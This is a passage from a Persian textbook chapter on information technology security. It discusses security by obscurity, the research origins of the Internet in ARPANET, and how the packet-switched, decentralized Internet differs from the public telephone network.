‫ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﮔﻮﻳﻲ ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺳﻴﺎﺳﺖ ﺭﺍ ﺍﻣﻨﻴـﺖ ﮔﻤﻨـﺎﻣﻲ‪ ٣٥‬ﻣـﻲ ﻧﺎﻣﻨـﺪ‪ .‬ﺑـﻪ ﻫﻤـﻴﻦ ﺗﺮﺗﻴـﺐ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔـﺬﺍﺭﺩﻩ ﺷـﻮﻧﺪ‬
‫ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ‬
‫ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻫﻤﻴﺸﻪ ﺩﺭ ﻳﻚ ﻣﻜﺎﻥ ﻧﻴﺴﺘﻨﺪ ﻫﻨﮕﺎﻡ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ‬
‫ﺍﻋﻤﺎﻝ ﺷﻮﺩ‪.‬‬
‫ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﻧﻈﻴﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪،‬‬
‫ﻭﻟﻲ ﺑﺎ ﻓﺮﺽ ﻃﺒﻴﻌـﺖ ﺧـﺎﺹ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ ﺍﺭﺗﺒـﺎﻁ ﻣﻴـﺎﻥ‬
‫ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻣﻮﺟــﻮﺩ ﺩﺭ ﺁﻥ‪ ،‬ﺍﻣﻨﻴــﺖ ﮔﻤﻨــﺎﻣﻲ ﻳــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﭘﻨﻬﺎﻥﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻲ ﺿﻌﻴﻒ ﻣـﻲﻧﻤﺎﻳـﺪ ﻭ ﺑﺎﻳـﺪ ﺍﺯ ﺁﻥ ﺍﺟﺘﻨـﺎﺏ‬
‫‪Privacy‬‬
‫‪Confidentiality‬‬
‫‪Security By Obscurity‬‬
‫‪33‬‬
‫‪34‬‬
‫‪35‬‬
‫ﻛﺮﺩ‪ .‬ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﻘﻴﺎﺳﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣـﺮﻭﺯ ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑـﺎ ﻫـﺪﻑ‬
‫ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍ ﹺ‬
‫ﭘﮋﻭﻫﺶ ﻭ ﺁﻣﻮﺯﺵ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﺑـﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜـﻪ ‪ARPANET‬‬
‫)ﺍﻳﻨﺘﺮﻧﺖ ﺍﻭﻟﻴﻪ( ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺍﻳﺠﺎﺩ ﺷﺪ‪ ،‬ﻫﺪﻑ ﺍﺻﻠﻲ ﺁﻥ ﺍﺷﺘﺮﺍﻙ‬
‫ﻣﻨﺎﺑﻊ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺘﻌﺪﺩ ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬
‫ﻣﺨﺘﻠﻒ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻫﺪﺍﻑ ﻳﻜـﺴﺎﻥ ﺩﺍﺷـﺘﻨﺪ ﻭ ﺑـﺎ ﻫـﺪﻑ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺷﺘﻦ ﻣﻨﺎﺑﻊ ﻭ ﺩﺍﺩﻩﻫﺎ ﻛﺎﺭ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﺷﺒﻜﻪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﻋﻀﺎﻱ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻣﻲﺷﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺁﻥ ﺯﻣﺎﻥ‬
‫ﻧﮕﺮﺍﻧﻲ ﭼﻨﺪﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﻧﺪﺍﺷـﺖ‪.‬‬
‫ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪ ﺟﻬﺎﻧﻲ ﻭﺏ ﻧﻴﺰ ﺑﺮ ﻫﻤﻴﻦ ﺍﺳﺎﺱ ﺷﻜﻞ ﮔﺮﻓﺖ ﺗـﺎ‬
‫ﻳﻚ ﺍﺑﺰﺍﺭ ﻗﻮﻱ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺷﺪ؛ ﺑﺪﻭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺮﺍﻱ ﻛﺴﺐ‬
‫ﻣﺠﻮﺯ ﻳﺎ ﺗﺴﻬﻴﻞ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﻣﺎﻟﻲ‪.‬‬
‫ﻓﺮﻫﻨﮓ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﭘﮋﻭﻫـﺸﮕﺮﺍﻥ ﻭ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻴﺎﻥ ﻃﻲ ﺩﻫﺔ ‪ ۹۰‬ﺗﻮﺳﻂ ‪ ARPANET‬ﻣﻄﺮﺡ ﺷـﺪ ﻭ‬
‫ﻫﻨﻮﺯ ﻫﻢ ﻧﺸﺎﻧﻪﻫـﺎﻳﻲ ﺍﺯ ﺁﻥ ﺩﻳـﺪﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ‬
‫ﻓﺮﻫﻨﮓ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﺗـﺎ ﺣـﺪ ﻣﻤﻜـﻦ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﻭ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻭ ﺍﻣﻜﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﺻـﺪﻫﺎ‬
‫ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﻣﺮﺩﻡ ﺩﺭ ﺳﺮﺗﺎﺳﺮ ﺟﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻭ ﭘﺎﺳﺨﻲ ﺑﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﭼـﺮﺍ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻪ ﺍﻳـﻦ ﺳـﻄﺢ ﺍﺯ ﺭﺷـﺪ ﺭﺳـﻴﺪﻩ ﺍﺳـﺖ‪ .‬ﺟﻨﺒـﺔ‬
‫ﺍﺧﻼﻗــﻲ ﺍﻳــﻦ ﻓﺮﻫﻨــﮓ ﺩﺭ ﮔﻔﺘﮕﻮﻫــﺎﻱ ﻋﺎﻣﻴﺎﻧــﺔ ﻣﺮﺩﻣــﻲ ﻛــﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﻨﺒﻌـﻲ ﺑـﺴﻴﺎﺭ ﺧـﻮﺏ ﻭ ﻣﻌﺘﺒـﺮ ﺗﻮﺻـﻴﻒ ﻣـﻲﻛﻨﻨـﺪ‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﻗﺪﺭﺕ ﺭﺳﺎﻧﻪﺍﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﺛﺮﺍﺕ ﻛـﺎﺭ‬
‫ﺑﺎ ﺁﻧﺮﺍ ﺩﻳﺪﻩﺍﻧﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﻣﺎﻫﻴـﺖ ﺍﻳﻨﺘﺮﻧـﺖ ﮔﻔﺘـﻪ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ "ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻥ ﺗﻤﺎﻳﻞ ﺑﻪ ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺩﺍﺭﻧﺪ"‪.‬‬
‫ﻳﻚ ﺗﻮﺟﻴﻪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻥ‬
‫ﺍﺳﺖ ﻛﻪ ﻧﺴﻞ ﺍﻭﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﻤﺎﺩ ﻣﺘﻘﺎﺑﻞ ﺍﻳﺠﺎﺩ ﺷﺪﻩ‬
‫ﺑﻮﺩ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﺷﻜﺎﺭﺍ ﺑﺮﺍﻱ ﻛـﺎﺭ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ ﻫـﻢ ﺍﻋﺘﻤـﺎﺩ‬
‫ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺑﺎ ﮔﺴﺘﺮﺵ ﻭﺳﻴﻊ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑـﻪ ﻋـﻀﻮﻳﺖ ﺩﺭﺁﻣـﺪﻥ‬
‫ﺍﻓﺮﺍﺩ ﺑﻴﺸﺘﺮ ﺑﺎ ﻋﻼﻳﻖ ﻭ ﺍﻫﺪﺍﻑ ﻣﺨﺘﻠﻒ ﺩﺭ ﺁﻥ‪ ،‬ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ‬
‫ﻣﻌﻨﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻳﻜـﻲ ﺍﺯ ﻣﺒﺎﺣـﺚ‬
‫ﻋﻤﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻌﺔ ﻣﻔﻬـﻮﻡ ﻧـﻮﻳﻦ ﺍﻋﺘﻤـﺎﺩ ﻣﺘﻘﺎﺑـﻞ ﺍﺳـﺖ‬
‫‪٣٥‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻗﺒـﻞ ﺍﺯ ﺧـﻮﺩ ﭼﻨـﺪﻳﻦ ﺗﻔـﺎﻭﺕ‬
‫ﺍﺳﺎﺳﻲ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺍﺯ ﺍﻳﻦ ﺗﻔﺎﻭﺗﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑـﺎ ﺷـﺒﻜﺔ ﺗﻠﻔـﻦ ﻋﻤـﻮﻣﻲ‬
‫ﺳﻮﺋﻴﭻ ﺷﺪﻩ )‪ ٣٦(PSTN‬ﻛـﻪ ﺭﻭﺯﺍﻧـﻪ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﺷﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﻢ ﺑﻬﺘﺮ ﺩﺭﻙ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﺳﺎﺱ ﻣﺪﻟﻲ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻛـﺎﺭ ﻣـﻲ ﻛﻨـﺪ ﻛـﻪ‬
‫‪ Packet Switching‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻋﺒﻮﺭ ﻣﻲ ﻛﻨﺪ ﺑـﻪ ﭼﻨـﺪﻳﻦ ﺑـﺴﺘﺔ ﺩﺍﺩﻩ ﺷﻜـﺴﺘﻪ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺷـﺪﻩ ﻭ ﻫـﺮ ﻛـﺪﺍﻡ ﺑـﺼﻮﺭﺕ‬
‫ﻣﺴﺘﻘﻞ ﺩﺭ ﺷﺒﻜﻪ ﺍﺭﺳﺎﻝ ﻭ ﭘﺲ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﺩﺭ ﻣﻘـﺼﺪ ﻣﺠـﺪﺩﹰﺍ‬
‫ﺳﺮﻫﻢﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ )ﻣﺴﻴﺮ ﺍﺭﺳﺎﻝ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ(‪ .‬ﺍﻳـﻦ‬
‫ﺭﻭﺵ ﺍﻧﺘﻘـﺎﻝ ﺩﺭ ﻧﻘﻄـﺔ ﻣﻘﺎﺑـﻞ ‪ - Circuit Switching‬ﻛـﻪ‬
‫‪ PSTN‬ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ‪ -‬ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺑـﻪ‬
‫ﻫﺮ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻳﻚ ﻣﺪﺍﺭ ﻭﺍﺣﺪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﻟـﺬﺍ‬
‫ﺩﺭ ﺁﻥ ﺣﺠﻢ ﺻﺪﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻳﺎﻓﺘﻪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﻣﻬﻢ ﻧﻴﺴﺖ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺭﺳﺎﻧﻪﺍﻱ ﻧﺎﺩﺍﻥ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽﻪ ﻛـﻪ ﻣـﻲﺩﺍﻧـﺪ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﻳﻚ ﺑﺴﺘﻪ ﺭﺍ ﺍﺯ ﻳﻚ ﻣﺒﺪﺃ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﻪ‬
‫‪٣٧‬‬
‫ﻳﻚ ﻣﻘﺼﺪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﺮﺳﺎﻧﺪ‪ .‬ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﺩﺭ ﺍﻧﺘﻬﺎ ﻭ ﺩﺭ ﻟﺒﻪﻫﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻋﻮﺽ ﺩﺭ ‪ PSTN‬ﺍﺳﺎﺱ ﻛﺎﺭ ﺷـﺒﻜﻪ "ﻫﻮﺷـﻤﻨﺪﻱ"‬
‫ﺍﺳﺖ ﻭ ﺍﺑـﺰﺍﺭ ﻛـﺎﺭﺑﺮ ﺩﺭ ﻧﻘـﺎﻁ ﺍﻧﺘﻬـﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩ ﺍﻧـﺪﻛﻲ ﺑـﺮﺍﻱ‬
‫ﺻﺤﺒﺖﻛﺮﺩﻥ ﻳﺎ ﮔﻮﺵﺩﺍﺩﻥ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﺍﺳﺖ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺮﺯﻫـﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬
‫ﺑﻪ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻭﻳﮋﮔـﻲ ﺑـﺎﺭﺯﺗﺮﻳﻦ ﻭ‬
‫ﺟﺎﻟﺒﺘﺮﻳﻦ ﺧﺼﻮﺻﻴﺖ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﺍﺭﺗﺒـﺎﻁ ﭼﻨـﺪﺍﻧﻲ ﺑـﻪ‬
‫ﺍﻣﻨﻴﺖ ﻧﺪﺍﺭﺩ‪ .‬ﺷﺒﻜﺔ ‪ PSTN‬ﻧﻴﺰ ﺟﻬﺎﻧﻲ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺗﻠﻔﻨﻲ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﻼ ﻛﺎﺭﺑﺮ ﺗﻠﻔﻦ ﻣﻲﺩﺍﻧﺪ ﻛﻪ ﺑـﺎ ﻳـﻚ ﻛـﺸﻮﺭ ﺧـﺎﺭﺟﻲ‬
‫ﻧﻴﺴﺖ ﻭ ﻣﺜ ﹰ‬
‫ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﺍﺳﺖ؛ ﺍﻣﺎ ﻭﻗﺘﻴﻜﻪ ﺑﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺳﺘﺮﺳـﻲ‬
‫ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻟﺰﻭﻣـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺪﺍﻧـﺪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺁﻥ ﺩﺭ‬
‫ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪.‬‬
‫‪Public Switched Telephone Network‬‬
‫‪Internet Services‬‬
‫‪36‬‬
‫‪37‬‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﻏﻴﺮﻣﺘﻤﺮﻛــﺰ ﺍﺳــﺖ ﻭ ﺩﺭ ﺁﻥ ﻫــﻴﭻ ﺳﻴــﺴﺘﻢ ﻣﺮﻛــﺰﻱ‬
‫ﺍﺭﺗﺒﺎﻃﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﻫﻤﻴﻨﻜﻪ ﺷـﻤﺎ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺍﺻـﻠﻲ ﺁﻥ‬
‫ﻧﻈﻴﺮ ‪ TCP/IP‬ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷـﺒﻜﻪ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻫﻤﻪﺟـﺎ ﺭﺍﻳـﺞ ﺍﺳـﺖ ﻭ ﻣﻮﺍﻧـﻊ ﻭﺭﻭﺩ ﺑـﻪ ﺁﻥ ﺍﻧـﺪﻙ‬
‫‪٤٠‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﻣﻘﺪﺍﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ )ﺳﺮﻋﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑـﺎ ﺁﻥ‬
‫ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴـﺪ( ﻧﻴﺰ ﺑﻪ ﻇﺮﻓﻴﺖ ﺣﻤـﻞ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ‪ ،‬ﺍﺗـﺼﺎﻻﺕ‬
‫ﻓﻴﺒﺮﻱ ﻳﺎ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﻭﺍﻗﻊ ﺩﺭ ﻣـﺴﻴﺮ ﺍﻧﺘﻘـﺎﻝ ﺑـﺴﺘﮕﻲ‬
‫ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺷﺎﻫﺮﺍﻩ ﺁﻥ ﻃﻴﻔﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛﻤﻴـﺎﺏ ﻭﺟـﻮﺩ‬
‫ﻧﺪﺍﺭﻧﺪ‪ .‬ﻫﺮﺟﺎ ﻛـﻪ ﺍﺯ ﻃﻴـﻒ ﺭﺍﺩﻳـﻮﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﮔـﺮﺩﺩ ‪ -‬ﻣﺎﻧﻨـﺪ‬
‫ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ )‪ ٤١(WLANs‬ﻛﻪ ﻣﻌﻤـﻮ ﹰ‬
‫‪ Wi-Fi‬ﺍﺯ ﺁﻧﻬﺎ ﻧﺎﻡ ﺑﺮﺩﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺮﺗﺒﻂ‬
‫ﻳﻚ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻛﻲ ﺭﺍ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ ﻛـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺳـﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻮﺳﻂ ﻭﺍﻗﻊ ﺩﺭ ﺑﺨـﺸﻬﺎﻳﻲ ﺍﺯ ﺩﻧﻴـﺎ ﻛـﻪ‬
‫ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﻣﺤﻠﻲ ﺩﺭ ﺁﻧﻬﺎ ﺭﺍﻳﮕﺎﻥ ﺍﺳﺖ ﻧـﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻥ ﺗﻤـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﻗﻴﻤﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔـﻦ ﻭ‬
‫ﻛﺎﻓﻲﻧﺖ ﻭ ﺩﻳﮕﺮ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑﺴﻴﺎﺭ‬
‫ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺩﺭﺻـﺪ‬
‫ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺮﺩﻡ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻧﻊ ﻣﻮﺟﻮﺩ ﻣﻴﺎﻥ ﻣﺆﻟﻒ ﻭ ﻧﺎﺷﺮ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻩ ﺍﺳـﺖ؛‬
‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺎﺷـﺮ ﺑﺎﺷـﻴﺪ ﻭ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺧـﺪﻣﺎﺕ‬
‫ﺷﺒﻜﻪﺍﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﻛﺎﻓﻴـﺴﺖ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ‬
